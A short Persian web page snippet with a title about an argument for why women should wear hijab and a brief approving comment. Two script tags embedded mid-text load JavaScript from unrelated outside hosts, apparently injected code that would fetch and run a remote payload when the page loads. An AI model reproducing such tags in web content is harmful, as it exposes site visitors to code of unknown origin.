استدلالی زیبا درباره اینکه چرا خانم ها باید حجاب داشته باشند.


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>چقدر خوبه که مسائلی مانند حجاب رو اینطور تبلیغ کنیم، نه سطحی و مقایسه کردن بانوان با آبنبات و ماشین!<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
13

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر